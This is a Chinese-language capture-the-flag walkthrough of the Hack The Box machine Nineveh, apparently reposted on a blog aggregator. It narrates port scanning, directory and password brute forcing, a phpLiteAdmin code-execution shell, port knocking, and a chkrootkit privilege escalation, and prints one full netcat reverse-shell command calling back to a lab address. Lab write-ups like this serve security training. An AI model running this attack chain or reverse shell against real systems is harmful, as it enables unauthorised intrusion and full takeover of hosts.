信息收集：

nmap -p- -sT --min-rate=10000 -Pn 10.129.26.243

nmap -p- -sU --min-rate=10000 -Pn 10.129.26.243

nmap -p80,443 -sT -sV -sC -O -Pn 10.129.26.243

發(fā)現(xiàn)域名nineveh.htb加入hosts文件中，因為只有80,443端口開放訪問，只好從web端入手了

將圖片下載后，分析了一下沒有其他信息與隱寫

?

?

沒有什么漏洞點，就先爆破子域名與目錄掃描

利用dirsearch目錄掃描http://nineveh.htb ，發(fā)現(xiàn)了info.php這個文件，訪問后發(fā)現(xiàn)其實是phpinfo

?dirsearch掃描https://nineveh.htb后發(fā)現(xiàn)了/db/目錄

?訪問后發(fā)現(xiàn)是phpliteadmin v1.9的登陸界面，利用searchsploit搜索歷史漏洞

目前只知道是v1.9版本，具體的版本號不清楚，都嘗試一下，嘗試后發(fā)現(xiàn)，漏洞都是需要先進入后臺才能觸發(fā)的，依舊沒有什么思路的收獲，只好再嘗試目錄掃描，看看有沒有什么遺漏的目錄

利用feroxbuster掃描出了一個新的目錄

?訪問后發(fā)現(xiàn)是一個新的登陸界面

?查看一下源代碼，似乎存在admin賬戶，并且可能跟數(shù)據(jù)庫有關(guān)

目前沒有其他的信息了，只能采用最簡單的方式，利用hydra進行密碼爆破

?成功爆破出密碼

登陸后發(fā)現(xiàn)沒有什么可以利用的信息

繼續(xù)嘗試爆破phpliteadmin的密碼

成功爆破出密碼password123

?利用爆出的密碼登陸后臺

?之前searchsploit發(fā)現(xiàn)了一個遠程代碼執(zhí)行漏洞

成功寫入shell,但是現(xiàn)在又發(fā)現(xiàn)了另一個困難，寫入了shell，此時需要一個文件包含的接口，否則我無法利用寫入的shell，這里有shell的絕對路徑/var/tmp/shell.php?

?

找了好久之后，在第一次進入的管理后臺發(fā)現(xiàn)了文件包含的接口

成功包含了shell.php,反彈shell成功，成功拿到立足點

?

?在/var/www/ssl/secure_notes下發(fā)現(xiàn)了一個圖片，遠程加載下來

?在圖片里發(fā)現(xiàn)了隱寫的內(nèi)容有ssh 的私鑰與公鑰，但是在之前掃描端口時，并沒有發(fā)現(xiàn)22端口開放

?查看了一下配置文件 /etc/knockd.conf，發(fā)現(xiàn)需要在5s內(nèi)訪問571,290,911才能開啟22端口

依次訪問571,290,911

?

?利用密匙成功連接ssh

?通過查看權(quán)限發(fā)現(xiàn)report目錄，對應當前用戶的權(quán)限

?仔細檢查了一下內(nèi)容，這個似乎是可以檢查rootkit后門

檢查了一下正常運行的程序，發(fā)現(xiàn)chkrootkit正在運行中

?chkrootkit存在本地提權(quán)漏洞，將文件寫入后，當chkrootkit掃描到會以root權(quán)限去嘗試運行

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.20 4455 >/tmp/f" > update

過一會兒后，成功接收到root權(quán)限的反彈shell

?

?

?

?

總結(jié)

以上是生活随笔為你收集整理的HTB打靶日记：Nineveh的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。